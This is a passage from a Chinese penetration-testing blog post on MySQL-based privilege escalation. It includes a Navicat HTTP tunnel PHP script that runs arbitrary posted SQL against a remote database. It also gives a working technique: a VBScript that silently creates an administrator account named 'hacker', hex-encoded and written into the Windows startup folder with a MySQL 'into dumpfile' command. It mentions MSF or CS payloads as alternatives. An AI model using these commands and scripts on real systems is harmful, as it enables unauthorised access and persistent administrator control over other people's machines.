class="variable">$conn</span>);</span><br><span class="line"> } <span class="keyword">elseif</span>(<span class="variable">$_POST</span>[<span class="string">"actn"</span>] == <span class="string">"Q"</span>) {</span><br><span class="line"> <span class="keyword">for</span>(<span class="variable">$i</span>=<span class="number">0</span>;<span class="variable">$i</span><count(<span class="variable">$_POST</span>[<span class="string">"q"</span>]);<span class="variable">$i</span>++) {</span><br><span class="line"> <span class="variable">$query</span> = <span class="variable">$_POST</span>[<span class="string">"q"</span>][<span class="variable">$i</span>];</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$query</span> == <span class="string">""</span>) <span class="keyword">continue</span>;</span><br><span class="line"> <span class="keyword">if</span> (phpversion_int() < <span class="number">50400</span>){ </span><br><span class="line"> <span class="keyword">if</span>(get_magic_quotes_gpc())</span><br><span class="line"> <span class="variable">$query</span> = stripslashes(<span class="variable">$query</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="variable">$res</span> = mysqli_query(<span class="variable">$conn</span>, <span class="variable">$query</span>);</span><br><span class="line"> <span class="variable">$errno</span> = mysqli_errno(<span class="variable">$conn</span>);</span><br><span class="line"> <span class="variable">$affectedrows</span> = mysqli_affected_rows(<span class="variable">$conn</span>);</span><br><span class="line"> <span class="variable">$insertid</span> = mysqli_insert_id(<span class="variable">$conn</span>); </span><br><span class="line"> <span class="keyword">if</span> (<span class="literal">false</span> !== <span class="variable">$res</span>) {</span><br><span class="line"> <span class="variable">$numfields</span> = mysqli_field_count(<span class="variable">$conn</span>);</span><br><span class="line"> <span class="variable">$numrows</span> = mysqli_num_rows(<span class="variable">$res</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$numfields</span> = <span class="number">0</span>;</span><br><span class="line"> <span class="variable">$numrows</span> = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> EchoResultSetHeader(<span class="variable">$errno</span>, <span class="variable">$affectedrows</span>, <span class="variable">$insertid</span>, <span class="variable">$numfields</span>, <span class="variable">$numrows</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$errno</span> > <span class="number">0</span>)</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(mysqli_error(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$numfields</span> > <span class="number">0</span>) {</span><br><span class="line"> EchoFieldsHeader(<span class="variable">$res</span>, <span class="variable">$numfields</span>);</span><br><span class="line"> EchoData(<span class="variable">$res</span>, <span class="variable">$numfields</span>, <span class="variable">$numrows</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span>(phpversion_int() >= <span class="number">40300</span>)</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(mysqli_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="keyword">echo</span> GetBlock(<span class="string">""</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$i</span><(count(<span class="variable">$_POST</span>[<span class="string">"q"</span>])-<span class="number">1</span>))</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"\x01"</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"\x00"</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="literal">false</span> !== <span class="variable">$res</span>)</span><br><span class="line"> mysqli_free_result(<span class="variable">$res</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$_POST</span>[<span class="string">"port"</span>] ) <span class="variable">$hs</span> .= <span class="string">":"</span>.<span class="variable">$_POST</span>[<span class="string">"port"</span>];</span><br><span class="line"> <span class="variable">$conn</span> = mysql_connect(<span class="variable">$hs</span>, <span class="variable">$_POST</span>[<span class="string">"login"</span>], <span class="variable">$_POST</span>[<span class="string">"password"</span>]);</span><br><span class="line"> <span class="variable">$errno_c</span> = mysql_errno();</span><br><span class="line"> <span class="comment">//if (phpversion_int() >= 50203){ // for unicode database name</span></span><br><span class="line"> <span class="comment">// mysql_set_charset('UTF8');</span></span><br><span class="line"> <span class="comment">//}</span></span><br><span class="line"> <span class="keyword">if</span>((<span class="variable">$errno_c</span> <= <span class="number">0</span>) && ( <span class="variable">$_POST</span>[<span class="string">"db"</span>] != <span class="string">""</span> )) {</span><br><span class="line"> <span class="variable">$res</span> = mysql_select_db( <span class="variable">$_POST</span>[<span class="string">"db"</span>], <span class="variable">$conn</span>);</span><br><span class="line"> <span class="variable">$errno_c</span> = mysql_errno();</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> EchoHeader(<span class="variable">$errno_c</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$errno_c</span> > <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(mysql_error());</span><br><span class="line"> } <span class="keyword">elseif</span>(<span class="variable">$_POST</span>[<span class="string">"actn"</span>] == <span class="string">"C"</span>) {</span><br><span class="line"> EchoConnInfo(<span class="variable">$conn</span>);</span><br><span class="line"> } <span class="keyword">elseif</span>(<span class="variable">$_POST</span>[<span class="string">"actn"</span>] == <span class="string">"Q"</span>) {</span><br><span class="line"> <span class="keyword">for</span>(<span class="variable">$i</span>=<span class="number">0</span>;<span class="variable">$i</span><count(<span class="variable">$_POST</span>[<span class="string">"q"</span>]);<span class="variable">$i</span>++) {</span><br><span class="line"> <span class="variable">$query</span> = <span class="variable">$_POST</span>[<span class="string">"q"</span>][<span class="variable">$i</span>];</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$query</span> == <span class="string">""</span>) <span class="keyword">continue</span>;</span><br><span class="line"> <span class="keyword">if</span> (phpversion_int() < <span class="number">50400</span>){ </span><br><span class="line"> <span class="keyword">if</span>(get_magic_quotes_gpc())</span><br><span class="line"> <span class="variable">$query</span> = stripslashes(<span class="variable">$query</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="variable">$res</span> = mysql_query(<span class="variable">$query</span>, <span class="variable">$conn</span>);</span><br><span class="line"> <span class="variable">$errno</span> = mysql_errno();</span><br><span class="line"> <span class="variable">$affectedrows</span> = mysql_affected_rows(<span class="variable">$conn</span>);</span><br><span class="line"> <span class="variable">$insertid</span> = mysql_insert_id(<span class="variable">$conn</span>);</span><br><span class="line"> <span class="variable">$numfields</span> = mysql_num_fields(<span class="variable">$res</span>);</span><br><span class="line"> <span class="variable">$numrows</span> = mysql_num_rows(<span class="variable">$res</span>);</span><br><span class="line"> EchoResultSetHeader(<span class="variable">$errno</span>, <span class="variable">$affectedrows</span>, <span class="variable">$insertid</span>, <span class="variable">$numfields</span>, <span class="variable">$numrows</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$errno</span> > <span class="number">0</span>)</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(mysql_error());</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$numfields</span> > <span class="number">0</span>) {</span><br><span class="line"> EchoFieldsHeader(<span class="variable">$res</span>, <span class="variable">$numfields</span>);</span><br><span class="line"> EchoData(<span class="variable">$res</span>, <span class="variable">$numfields</span>, <span class="variable">$numrows</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span>(phpversion_int() >= <span class="number">40300</span>)</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(mysql_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="keyword">echo</span> GetBlock(<span class="string">""</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$i</span><(count(<span class="variable">$_POST</span>[<span class="string">"q"</span>])-<span class="number">1</span>))</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"\x01"</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"\x00"</span>;</span><br><span class="line"> mysql_free_result(<span class="variable">$res</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">exit</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> header(<span class="string">"Content-Type: text/html"</span>);</span><br><span class="line"><span class="comment">////</span></span><br><span class="line"><span class="comment">/////////////////////////////////////////////////////////////////////////////</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></span><br><span class="line"><!DOCTYPE html <span class="keyword">PUBLIC</span> <span class="string">"-//W3C//DTD HTML 4.01 Transitional//EN"</span> <span class="string">"http://www.w3.org/TR/html4/loose.dtd"</span>></span><br><span class="line"><html></span><br><span class="line"><head></span><br><span class="line"> <title>Navicat HTTP Tunnel Tester</title></span><br><span class="line"> <meta http-equiv=<span class="string">"Content-Type"</span> content=<span class="string">"text/html; charset=ISO-8859-1"</span>></span><br><span class="line"> <style type=<span class="string">"text/css"</span>></span><br><span class="line"> body{</span><br><span class="line"> margin: <span class="number">30</span>px;</span><br><span class="line"> font-family: Tahoma;</span><br><span class="line"> font-weight: normal;</span><br><span class="line"> font-size: <span class="number">14</span>px;</span><br><span class="line"> color: <span class="comment">#222222;</span></span><br><span class="line"> }</span><br><span class="line"> table{</span><br><span class="line"> width: <span class="number">100</span>%;</span><br><span class="line"> border: <span class="number">0</span>px;</span><br><span class="line"> }</span><br><span class="line"> input{</span><br><span class="line"> font-family:Tahoma,sans-serif;</span><br><span class="line"> border-style:solid;</span><br><span class="line"> border-color:<span class="comment">#666666;</span></span><br><span class="line"> border-width:<span class="number">1</span>px;</span><br><span class="line"> }</span><br><span class="line"> fieldset{</span><br><span class="line"> border-style:solid;</span><br><span class="line"> border-color:<span class="comment">#666666;</span></span><br><span class="line"> border-width:<span class="number">1</span>px;</span><br><span class="line"> }</span><br><span class="line"> .Title1{</span><br><span class="line"> font-size: <span class="number">30</span>px;</span><br><span class="line"> color: <span class="comment">#003366;</span></span><br><span class="line"> }</span><br><span class="line"> .Title2{</span><br><span class="line"> font-size: <span class="number">10</span>px;</span><br><span class="line"> color: <span class="comment">#999966;</span></span><br><span class="line"> }</span><br><span class="line"> .TestDesc{</span><br><span class="line"> width:<span class="number">70</span>%</span><br><span class="line"> }</span><br><span class="line"> .TestSucc{</span><br><span class="line"> color: <span class="comment">#00BB00;</span></span><br><span class="line"> }</span><br><span class="line"> .TestFail{</span><br><span class="line"> color: <span class="comment">#DD0000;</span></span><br><span class="line"> }</span><br><span class="line"> .mysql{</span><br><span class="line"> }</span><br><span class="line"> .pgsql{</span><br><span class="line"> display:none;</span><br><span class="line"> }</span><br><span class="line"> .sqlite{</span><br><span class="line"> display:none;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">#page{</span></span><br><span class="line"> max-width: <span class="number">42</span>em;</span><br><span class="line"> min-width: <span class="number">36</span>em;</span><br><span class="line"> border-width: <span class="number">0</span>px;</span><br><span class="line"> margin: auto auto;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">#host, #dbfile{</span></span><br><span class="line"> width: <span class="number">300</span>px;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">#port{</span></span><br><span class="line"> width: <span class="number">75</span>px;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">#login, #password, #db{</span></span><br><span class="line"> width: <span class="number">150</span>px;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">#Copyright{</span></span><br><span class="line"> text-align: right;</span><br><span class="line"> font-size: <span class="number">10</span>px;</span><br><span class="line"> color: <span class="comment">#888888;</span></span><br><span class="line"> }</span><br><span class="line"> </style></span><br><span class="line"> <script type=<span class="string">"text/javascript"</span>></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">getInternetExplorerVersion</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="keyword">var</span> ver = -<span class="number">1</span>;</span><br><span class="line"> <span class="keyword">if</span> (navigator.appName == <span class="string">"Microsoft Internet Explorer"</span>){</span><br><span class="line"> <span class="keyword">var</span> regex = <span class="keyword">new</span> RegExp(<span class="string">"MSIE ([0-9]{1,}[\.0-9]{0,})"</span>);</span><br><span class="line"> <span class="keyword">if</span> (regex.exec(navigator.userAgent))</span><br><span class="line"> ver = parseFloat(RegExp.$<span class="number">1</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> ver;</span><br><span class="line"> }</span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">setText</span>(<span class="params">element, text, succ</span>)</span>{</span><br><span class="line"> element.className = (succ)?<span class="string">"TestSucc"</span>:<span class="string">"TestFail"</span>;</span><br><span class="line"> element.innerHTML = text;</span><br><span class="line"> }</span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">getByteAt</span>(<span class="params">str, offset</span>)</span>{</span><br><span class="line"> <span class="keyword">return</span> str.charCodeAt(offset) & <span class="number">0xff</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">getIntAt</span>(<span class="params">binStr, offset</span>)</span>{</span><br><span class="line"> <span class="keyword">return</span> (getByteAt(binStr, offset) << <span class="number">24</span>)+</span><br><span class="line"> (getByteAt(binStr, offset+<span class="number">1</span>) << <span class="number">16</span>)+</span><br><span class="line"> (getByteAt(binStr, offset+<span class="number">2</span>) << <span class="number">8</span>)+</span><br><span class="line"> (getByteAt(binStr, offset+<span class="number">3</span>) >>> <span class="number">0</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">getBlockStr</span>(<span class="params">binStr, offset</span>)</span>{</span><br><span class="line"> <span class="keyword">if</span> (getByteAt(binStr, offset) < <span class="number">254</span>)</span><br><span class="line"> <span class="keyword">return</span> binStr.substring(offset+<span class="number">1</span>, offset+<span class="number">1</span>+binStr.charCodeAt(offset));</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="keyword">return</span> binStr.substring(offset+<span class="number">5</span>, offset+<span class="number">5</span>+getIntAt(binStr, offset+<span class="number">1</span>));</span><br><span class="line"> }</span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">doServerTest</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="keyword">var</span> version = getInternetExplorerVersion();</span><br><span class="line"> <span class="keyword">if</span> (version==-<span class="number">1</span> || version>=<span class="number">9.0</span>){</span><br><span class="line"> <span class="keyword">var</span> xmlhttp = (window.XMLHttpRequest)? <span class="keyword">new</span> XMLHttpRequest() : xmlhttp=<span class="keyword">new</span> ActiveXObject(<span class="string">"Microsoft.XMLHTTP"</span>);</span><br><span class="line"> </span><br><span class="line"> xmlhttp.onreadystatechange=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="keyword">var</span> outputDiv = document.getElementById(<span class="string">"ServerTest"</span>);</span><br><span class="line"> <span class="keyword">if</span> (xmlhttp.readyState == <span class="number">4</span>){</span><br><span class="line"> <span class="keyword">if</span> (xmlhttp.status == <span class="number">200</span>){</span><br><span class="line"> <span class="keyword">var</span> errno = getIntAt(xmlhttp.responseText, <span class="number">6</span>);</span><br><span class="line"> <span class="keyword">if</span> (errno == <span class="number">0</span>)</span><br><span class="line"> setText(outputDiv, <span class="string">"Connection Success!"</span>, <span class="literal">true</span>);</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> setText(outputDiv, parseInt(errno)+<span class="string">" - "</span>+getBlockStr(xmlhttp.responseText, <span class="number">16</span>), <span class="literal">false</span>);</span><br><span class="line"> }<span class="keyword">else</span></span><br><span class="line"> setText(outputDiv, <span class="string">"HTTP Error - "</span>+xmlhttp.status, <span class="literal">false</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">var</span> params = <span class="string">""</span>;</span><br><span class="line"> <span class="keyword">var</span> form = document.getElementById(<span class="string">"TestServerForm"</span>);</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i=<span class="number">0</span>; i<form.elements.length; i++){</span><br><span class="line"> <span class="keyword">if</span> (i><span class="number">0</span>) params += <span class="string">"&"</span>;</span><br><span class="line"> params += form.elements[i].id+<span class="string">"="</span>+form.elements[i].value.replace(<span class="string">"&"</span>, <span class="string">"%26"</span>);</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> document.getElementById(<span class="string">"ServerTest"</span>).className = <span class="string">""</span>;</span><br><span class="line"> document.getElementById(<span class="string">"ServerTest"</span>).innerHTML = <span class="string">"Connecting..."</span>;</span><br><span class="line"> xmlhttp.open(<span class="string">"POST"</span>, <span class="string">""</span>, <span class="literal">true</span>);</span><br><span class="line"> xmlhttp.setRequestHeader(<span class="string">"Content-type"</span>, <span class="string">"application/x-www-form-urlencoded"</span>);</span><br><span class="line"> xmlhttp.setRequestHeader(<span class="string">"Content-length"</span>, params.length);</span><br><span class="line"> xmlhttp.setRequestHeader(<span class="string">"Connection"</span>, <span class="string">"close"</span>);</span><br><span class="line"> xmlhttp.send(params);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> document.getElementById(<span class="string">"ServerTest"</span>).className = <span class="string">""</span>;</span><br><span class="line"> document.getElementById(<span class="string">"ServerTest"</span>).innerHTML = <span class="string">"Internet Explorer "</span>+version+<span class="string">" is not supported, please use Internet explorer 9.0 or above, firefox, chrome or safari"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </script></span><br><span class="line"></head></span><br><span class="line"></span><br><span class="line"><body></span><br><span class="line"><div id=<span class="string">"page"</span>></span><br><span class="line"><p></span><br><span class="line"> <font <span class="class"><span class="keyword">class</span>="<span class="title">Title1</span>"><span class="title">Navicat</span>&<span class="title">trade</span>;</<span class="title">font</span>><<span class="title">br</span>></span></span><br><span class="line"><span class="class"> <<span class="title">font</span> <span class="title">class</span>="<span class="title">Title2</span>"><span class="title">The</span> <span class="title">gateway</span> <span class="title">to</span> <span class="title">your</span> <span class="title">database</span>!</<span class="title">font</span>></span></span><br><span class="line"><span class="class"></<span class="title">p</span>></span></span><br><span class="line"><span class="class"><<span class="title">fieldset</span>></span></span><br><span class="line"><span class="class"> <<span class="title">legend</span>><span class="title">System</span> <span class="title">Environment</span> <span class="title">Test</span></<span class="title">legend</span>></span></span><br><span class="line"><span class="class"> <<span class="title">table</span>></span></span><br><span class="line"><span class="class"> <<span class="title">tr</span> <span class="title">style</span>="<?<span class="title">php</span> <span class="title">echo</span> "<span class="title">display</span>:<span class="title">none</span>"; ?>"><<span class="title">td</span> <span class="title">width</span>=70%><span class="title">PHP</span> <span class="title">installed</span> <span class="title">properly</span></<span class="title">td</span>><<span class="title">td</span> <span class="title">class</span>="<span class="title">TestFail</span>"><span class="title">No</span></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> <?<span class="title">php</span> <span class="title">echo</span> <span class="title">doSystemTest</span>();?></span></span><br><span class="line"><span class="class"> </<span class="title">table</span>></span></span><br><span class="line"><span class="class"></<span class="title">fieldset</span>></span></span><br><span class="line"><span class="class"><<span class="title">br</span>></span></span><br><span class="line"><span class="class"><<span class="title">fieldset</span>></span></span><br><span class="line"><span class="class"> <<span class="title">legend</span>><span class="title">Server</span> <span class="title">Test</span></<span class="title">legend</span>></span></span><br><span class="line"><span class="class"> <<span class="title">form</span> <span class="title">id</span>="<span class="title">TestServerForm</span>" <span class="title">action</span>="#" <span class="title">onSubmit</span>="<span class="title">return</span> <span class="title">false</span>;"></span></span><br><span class="line"><span class="class"> <<span class="title">input</span> <span class="title">type</span>=<span class="title">hidden</span> <span class="title">id</span>="<span class="title">actn</span>" <span class="title">value</span>="<span class="title">C</span>"></span></span><br><span class="line"><span class="class"> <<span class="title">table</span>></span></span><br><span class="line"><span class="class"> <<span class="title">tr</span> <span class="title">class</span>="<span class="title">mysql</span>"><<span class="title">td</span> <span class="title">width</span>="35%"><span class="title">Hostname</span>/<span class="title">IP</span> <span class="title">Address</span>:</<span class="title">td</span>><<span class="title">td</span>><<span class="title">input</span> <span class="title">type</span>=<span class="title">text</span> <span class="title">id</span>="<span class="title">host</span>" <span class="title">placeholder</span>="<span class="title">localhost</span>"></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> <<span class="title">tr</span> <span class="title">class</span>="<span class="title">mysql</span>"><<span class="title">td</span>><span class="title">Port</span>:</<span class="title">td</span>><<span class="title">td</span>><<span class="title">input</span> <span class="title">type</span>=<span class="title">text</span> <span class="title">id</span>="<span class="title">port</span>" <span class="title">placeholder</span>="3306"></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> <<span class="title">tr</span> <span class="title">class</span>="<span class="title">pgsql</span>"><<span class="title">td</span>><span class="title">Initial</span> <span class="title">Database</span>:</<span class="title">td</span>><<span class="title">td</span>><<span class="title">input</span> <span class="title">type</span>=<span class="title">text</span> <span class="title">id</span>="<span class="title">db</span>" <span class="title">placeholder</span>="<span class="title">template1</span>"></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> <<span class="title">tr</span> <span class="title">class</span>="<span class="title">mysql</span>"><<span class="title">td</span>><span class="title">Username</span>:</<span class="title">td</span>><<span class="title">td</span>><<span class="title">input</span> <span class="title">type</span>=<span class="title">text</span> <span class="title">id</span>="<span class="title">login</span>" <span class="title">placeholder</span>="<span class="title">root</span>"></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> <<span class="title">tr</span> <span class="title">class</span>="<span class="title">mysql</span>"><<span class="title">td</span>><span class="title">Password</span>:</<span class="title">td</span>><<span class="title">td</span>><<span class="title">input</span> <span class="title">type</span>=<span class="title">password</span> <span class="title">id</span>="<span class="title">password</span>" <span class="title">placeholder</span>=""></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> <<span class="title">tr</span> <span class="title">class</span>="<span class="title">sqlite</span>"><<span class="title">td</span>><span class="title">Database</span> <span class="title">File</span>:</<span class="title">td</span>><<span class="title">td</span>><<span class="title">input</span> <span class="title">type</span>=<span class="title">text</span> <span class="title">id</span>="<span class="title">dbfile</span>" <span class="title">placeholder</span>="<span class="title">sqlite</span>.<span class="title">db</span>"></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> <<span class="title">tr</span>><<span class="title">td</span>></<span class="title">td</span>><<span class="title">td</span>><<span class="title">br</span>><<span class="title">input</span> <span class="title">id</span>="<span class="title">TestButton</span>" <span class="title">type</span>="<span class="title">submit</span>" <span class="title">value</span>="<span class="title">Test</span> <span class="title">Connection</span>" <span class="title">onClick</span>="<span class="title">doServerTest</span>()"></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> </<span class="title">table</span>></span></span><br><span class="line"><span class="class"> </<span class="title">form</span>></span></span><br><span class="line"><span class="class"> <<span class="title">div</span> <span class="title">id</span>="<span class="title">ServerTest</span>"><<span class="title">br</span>></<span class="title">div</span>></span></span><br><span class="line"><span class="class"></<span class="title">fieldset</span>></span></span><br><span class="line"><span class="class"><<span class="title">p</span> <span class="title">id</span>="<span class="title">Copyright</span>"><span class="title">Copyright</span> &<span class="title">copy</span>; <span class="title">PremiumSoft</span> &<span class="title">trade</span>; <span class="title">CyberTech</span> <span class="title">Ltd</span>. <span class="title">All</span> <span class="title">Rights</span> <span class="title">Reserved</span>.</<span class="title">p</span>></span></span><br><span class="line"><span class="class"></<span class="title">div</span>></span></span><br><span class="line"><span class="class"></<span class="title">body</span>></span></span><br><span class="line"><span class="class"></<span class="title">html</span>></span></span><br></pre></td></tr></table></figure>
<p>然后连接Navicat,选择HTTP通道,输入带有php脚本的远程链接</p>
<p>然后地址选择本地<code>localhost</code>选择连接,然后就可以执行MySQL命令了</p>
<h2 id="启动项提权"><a href="#启动项提权" class="headerlink" title="启动项提权"></a>启动项提权</h2><p>当 Windows 的启动项可以被 MySQL 写入的时候可以使用 MySQL 将自定义脚本导入到启动项中,这个脚本会在用户登录、开机、关机的时候自动运行。</p>
<p><strong>启动项路径</strong></p>
<p><strong>Windows Server 2003</strong> 的启动项路径</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 中文系统</span></span><br><span class="line">C:\Documents and Settings\Administrator\「开始」菜单\程序\启动</span><br><span class="line">C:\Documents and Settings\All Users\「开始」菜单\程序\启动</span><br><span class="line"></span><br><span class="line"><span class="comment"># 英文系统</span></span><br><span class="line">C:\Documents and Settings\Administrator\Start Menu\Programs\Startup</span><br><span class="line">C:\Documents and Settings\All Users\Start Menu\Programs\Startup</span><br><span class="line"></span><br><span class="line"><span class="comment"># 开关机项 需要自己建立对应文件夹</span></span><br><span class="line">C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup</span><br><span class="line">C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Shutdown</span><br></pre></td></tr></table></figure>
<p><strong>Windows Server 2008</strong> 的启动项路径</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</span><br><span class="line">C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup</span><br></pre></td></tr></table></figure>
<p>既然知道路径的话就往启动项路径里面写入脚本吧,脚本支持 vbs 和 exe 类型,可以利用 vbs 执行一些 CMD 命令,也可以使用 exe 上线 MSF 或者 CS 这方面还是比较灵活的。下面是一个执行基础命令的 VB 脚本</p>
<figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Set</span> WshShell=WScript.<span class="built_in">CreateObject</span>(<span class="string">"WScript.Shell"</span>)</span><br><span class="line">WshShell.Run <span class="string">"net user hacker P@ssw0rd /add"</span>, <span class="number">0</span></span><br><span class="line">WshShell.Run <span class="string">"net localgroup administrators hacker /add"</span>, <span class="number">0</span></span><br></pre></td></tr></table></figure>
<p>将上述 vbs 或者 CS 的马转十六进制直接写如到系统启动项中,然后等待系统用户重新登录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql > select 0x536574205773685368656C6C3D575363726970742E4372656174654F626A6563742822575363726970742E5368656C6C22290A5773685368656C6C2E52756E20226E65742075736572206861636B6572205040737377307264202F616464222C20300A5773685368656C6C2E52756E20226E6574206C6F63616C67726F75702061646D696E6973747261746F7273206861636B6572202F616464222C20300A into dumpfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\test.vbs";</span><br></pre></td></tr></table></figure>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">BaiKer</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://baiker.top/bb41611ac1d5.html">http://baiker.top/bb41611ac1d5.html</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外,均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://baiker.top" target="_blank">BaiKer</a>!</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a><a class="post-meta__tags" href="/tags/%E6%8F%90%E6%9D%83/">提权</a></div><div class="post_share"><div class="social-share" data-image="https://baiker.top/img/wallhaven-gj977q.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/44b9cec07681.html"><img class="prev-cover" src="https://baiker.top/img/wallhaven-gj977q.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">CSRF跨站请求伪造漏洞</div></div></a></div><div class="next-post pull-right"><a href="/fb3d18df70f1.html"><img class="next-cover" src="https://baiker.top/img/wallhaven-gj977q.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">Redis 未授权访问漏洞</div></div></a></div></nav><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div></div><div class="comment-wrap"><div><div class="vcomment" id="vcomment"></div></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/avatar.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">BaiKer</div><div class="author-info__description">网络安全</div></div><div class="card-info-data is-center"><div class="card-info-data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">40</div></a></div><div class="card-info-data-item"><a href="/tags/"><div 